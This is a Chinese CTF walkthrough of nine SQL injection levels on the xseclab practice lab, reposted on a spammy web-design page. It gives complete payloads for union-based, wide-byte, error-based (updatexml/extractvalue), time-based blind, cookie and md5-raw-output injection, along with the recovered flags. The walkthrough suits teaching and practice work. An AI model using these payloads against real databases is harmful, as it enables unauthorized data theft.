当前位置: 首页 > news >正文

网站建设协议盐城网站开发效果

网站建设协议,盐城网站开发效果,和wordpress价值,网络小白如何建立个人网站4.注入关 1.最简单的SQL注入 url:http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php 查看源代码#xff0c;登录名为admin 最简单的SQL注入#xff0c;登录名写入一个常规的注入语句#xff1a; admin’ or ‘1’1 密码随便填#xff0c;验证…4.注入关 1.最简单的SQL注入 url:http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php 查看源代码登录名为admin 最简单的SQL注入登录名写入一个常规的注入语句 admin’ or ‘1’1 密码随便填验证码填正确的点击登录 得到我的座右铭(flag)是iamflagsafsfskdf11223 2.最简单的SQL注入(熟悉注入环境) urlhttp://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php 查看源代码访问urlhttp://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id1 构造页面并访问?id1 and 11 返回正常?id1 and 12返回出错说明存在SQL注入 判断字段数 ?id1 order by 3页面返回正常说明有三个字段 判断回显点 ?id-1 union select 1,2,3 我们可以在如图所示位置进行查询 查询数据库名为mydbs ?id-1 union select 1,2,database() 查询数据表为sae_user_sqli3 ?id-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemadatabase() 查询字段名为id,title,content ?id-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_namesae_user_sqli3 查询字段内容 ?id-1 union select 1,2,content from sae_user_sqli3 得到HKGGflagdfs56757fsdv 3.防注入 urlhttp://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php 本关尝试使用宽字节注入添加单引号会出现空白页没有报错使用?id1%df’ 成功报错找到注入点 构造语句?id1%df%27%20or%2011%23 页面正常回显说明or语句执行成功可以注入 构造语句?id1%df%27%20or%2011%20limit%202,1%23 得到Hsaagdfs56sdf7fsdv 另外一种方法是像上一关一样操作只是需要构造语句?id1%df%27 。。。%23 确定字段长度 http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id1%df’ order by 3 %23 确定显示位 http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id1%df’ union select 1,2,3 %23 得到数据库 http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id1%df union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()) %23得到列名 http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id1%df union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name0x7361655f757365725f73716c6934) %23得到字段 http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id1%df union select 1,2,(select group_concat(title_1,content_1) from sae_user_sqli4) %234.到底能不能回显 urlhttp://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start0num1 经过测试只有start参数有作用num参数并没有作用。 构造payload 查询数据库名 http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start0 procedure analyse (extractvalue(rand(),concat(0x3a,(select database()))),1)%23num1查询数据表名 http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start0 procedure analyse (extractvalue(rand(),concat(0x3a,(select group_concat(table_name)from information_schema.tables where table_schemadatabase()))),1)%23num1查询列名(由于分号被过滤了只能将表名转换成16进制) http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start0 procedure analyse (extractvalue(rand(),concat(0x3a,(select group_concat(column_name)from information_schema.columns where table_name0x75736572))),1)%23num1查询flagmyflagishere http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start0 procedure analyse (extractvalue(rand(),concat(0x3a,(select password from mydbs.user limit 2,1))),1)%23num15.邂逅 urlhttp://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg 真的是第一次见图片后缀前面注入加宽字节注入因为无回显所以用burp注入 burp对图片抓包的设置 在上图所示的位置 构造payload 查询注入点 http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1%df’.jpg 页面报错 查询列数4列 http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1%df%27 order by 4 %23.jpg 查询显示位3 http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1%df%27 union select 1,2,3,4%23.jpg 查询数据库mydbs http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1%df%27 union select 1,2,(select database()),4 %23.jpg 查询表名article,pic http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1%df%27 union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schemadatabase()),4 %23.jpg查询列名id,picname,data,text http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1%df%27 union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name0x706963),4 %23.jpg查询数据flag http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1%df%27 union select 1,2,(select picname from pic limit 2,1),4 %23.jpg 将图片后缀改为flagishere_askldjfklasjdfl.jpg 访问urlhttp://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/flagishere_askldjfklasjdfl.jpg 得到flag is “IamflagIloveyou!” 6.ErrorBased url :http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?usernameadmin 本题考查mysql的报错注入 查询数据库名mydbs ?usernameadmin%27%20or%20updatexml(1,concat(0x7e,(select%20database())),1)%20–%20q 查询数据表名log,motto,user ?usernameadmin%27%20or%20updatexml(1,concat(0x7e,(select%20group_concat(table_name) from information_schema.tables where table_schemadatabase())),1)%20–%20q 查询motto表的下的列名id,username,motto ?usernameadmin%27%20or%20updatexml(1,concat(0x7e,(select%20group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_name‘motto’)),1)%20–%20q 查询id字段的值0,1,2,100000 ?usernameadmin%27%20or%20updatexml(1,concat(0x7e,(select%20group_concat(id) from motto)),1)%20–%20q 查询username字段的值admin,guest,test,#adf#ad# ?usernameadmin%27%20or%20updatexml(1,concat(0x7e,(select%20group_concat(username) from motto)),1)%20–%20q 查询motto字段的值mymotto,happy everyday,nothing ?usernameadmin%27%20or%20updatexml(1,concat(0x7e,(select%20group_concat(motto) from motto)),1)%20–%20q 对比两次注入的结果发现username字段比motto字段多一个结果这说明flag可能就在被隐藏的结果中 再次构造语句,直接查询第四个值得到notfound! 根据提示flag不带key和# ?usernameadmin%27%20or%20updatexml(1,concat(0x7e,(select%20(motto) from motto limit 3,1)),1)%20–%20q 7.盲注 urlhttp://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php 本题使用延时盲注 判断当前数据库名长度为5页面没有延时说明数据库长度为5 %27and%20sleep(if((length(database())5),0,3))–%20q 判断库名第一个值为m页面没有延时说明数据库第一个值为m ’ and if(substr(database(),1,1)‘m’,0,sleep(3))-- q 以此类推数据库名为mydbs 判断表名第一个表的第一个值为l页面没有延时说明第一个表的第一个值为l ’ and if(substr((select table_name from information_schema.tables where table_schemadatabase() limit 0,1),1,1)‘l’,0,sleep(3))-- q 以此类推数据表名为log,motto,user 判断motto表中第一个字段的第一个值是i页面没有延时users表中第一个字段的第一个值是i ’ and if(substr((select column_name from information_schema.columns where table_schemadatabase() and table_name‘motto’ limit 0,1),1,1)‘i’,0,sleep(3))-- q 以此类推数据表motto中的字段值为id,username,motto 判断motto表中第一个内容的第一个值为m页面没有延时motto表中第一个内容的第一个值为m ’ and if(substr((select id from motto limit 0,1),1,1)‘0’,0,sleep(3))-- q 以此类推得到flagnotfound! 延时注入太慢了sqlmap跑也比较慢 8.SQL注入通用防护 urlhttp://lab1.xseclab.com/sqli8_f4af04563c22b18b51d9142ab0bfb13d/index.php?id1 本题提示过滤了GET/POST,所以我们猜测是否可以进行cookie注入使用burp抓包 在cookie处构造字段id1 and 11回显正常id1 and 12回显错误说明此处存在数字型SQL注入 查询字段数目 id1 order by 3 最后得到字段数目是3。 查询显示位得到显示位是23 id1 union select 1,2,3 查询数据库名得到数据库名为mydbs id1 union select 1,2,database() 查询表名得到在当前数据库中的表有sae_manager_sqli8,sae_user,sqli8 id1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()) 查询sae_manage_sqli8表中的字段得到了id,username,password这3个字段 id1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name‘sae_manager_sqli8’) 查询flagIamFlagCookieInject! id1 union select 1,2,password from sae_manager_sqli8 9.据说哈希后的密码是不能产生注入的 urlhttp://lab1.xseclab.com/code1_9f44bab1964d2f959cf509763980e156/ 查看关键源 select * from user where userid.intval($_GET[userid]). and password.md5($_GET[pwd], true) .对传入的userid使用了intval()函数转化为数字同时将password使用md5()函数进行转化。这就是一个典型的MD5加密后的SQL注入。 其中最主要的就是md5()函数当第二个参数为true时会返回16字符的二进制格式。当为false的时候返回的就是32字符十六进制数。默认的是false模式。具体的差别通过下面这个代码来看。 md5(‘123’) //202cb962ac59075b964b07152d234b70 md5(‘123’,true) // ,bY[K-#Kp 只要md5(str,true)之后的值是包含了’or’这样的字符串那么sql语句就会变为select * from users where usrid“XXX” and password‘‘or’’。如此就可以绕过了。 提供一个字符ffifdyop md5后276f722736c95d99e921722cf9ed621c 可以伪造成 select * from user where userid‘1’ and pwd ‘or’6É]™é!r,ùíb’ 从而成功绕过得到Flag: FsdLAG67a6dajsdklsdf payload http://lab1.xseclab.com/code1_9f44bab1964d2f959cf509763980e156/?userid1pwdffifdyop 文笔生疏措辞浅薄望各位大佬不吝赐教万分感谢。 免责声明由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失均由使用者本人负责 文章作者不为此承担任何责任。 转载声明儒道易行 拥有对此文章的修改和解释权如欲转载或传播此文章必须保证此文章的完整性包括版权声明等全部内容。未经作者允许不得任意修改或者增减此文章的内容不得以任何方式将其用于商业目的。 博客: https://rdyx0.github.io/先知社区 https://xz.aliyun.com/u/37846SecIN: https://www.sec-in.com/author/3097CSDN: https://blog.csdn.net/weixin_48899364?typeblog公众号 https://mp.weixin.qq.com/mp/appmsgalbum?__bizMzg5NTU2NjA1Mwactiongetalbumalbum_id1696286248027357190scene173from_msgid2247485408from_itemidx1count3nolastread1#wechat_redirectFreeBuf https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
http://www.dnsts.com.cn/news/74851.html

相关文章:

  • edu网站开发周口建设路网站
  • 甘肃网站备案廉溪区建设局网站
  • js网站开发视频企业管理系统咨询
  • 爱射影院网站建设中兰州网络公司排名
  • 陕西省建设工程质量安全监督总站网站自己电脑做网站访问速度
  • 四川网站备案核验单百度软件下载中心官方网站
  • 建设网站费用多少asp.net 价格查询网站
  • 浙江建设厅官方网站企业管理咨询服务有限公司
  • 手机膜 东莞网站建设如何做好互联网营销
  • 集团网站设计方案昆明手机网站推荐
  • 提供网站空间服务器做网站第三方
  • 外贸网站搭建推广seo就业前景怎么样
  • 自己怎么设计3d装修图wordpress 文章seo
  • 浅谈电子商务网站建设手机网站建设机构
  • 汕头网站制作公司价格微信点餐小程序怎么制作
  • 网站如何制作学校的做南京网站建设 雷仁网
  • 南通网站建设解决方案网站流量查询站长之家
  • 如何把网站做的和别人一样吗无锡网站制作公司哪家好
  • wdcp更改网站域名企业网站建站哪家好
  • 网站模板上传html制作网站
  • 大会的网站架构seo推广价格
  • 保定网站建设优化企业外部网站建设
  • 品牌型网站建设解决方案电子商城网站建议书
  • 福建住建设厅官方网站网店代运营收费标准
  • 深圳做网站建设沧州哪里有做网站的公司4000-
  • 四川住房建设部网站怎么自己做淘客网站
  • 建站模板网山东省住房和城乡建设厅注册中心
  • 网页首页设计代码seo黑帽教学网
  • 成都高端网站开发网站建设安装部署必须买吗
  • 自助建站和速成网站学习网页设计中遇到的心得体会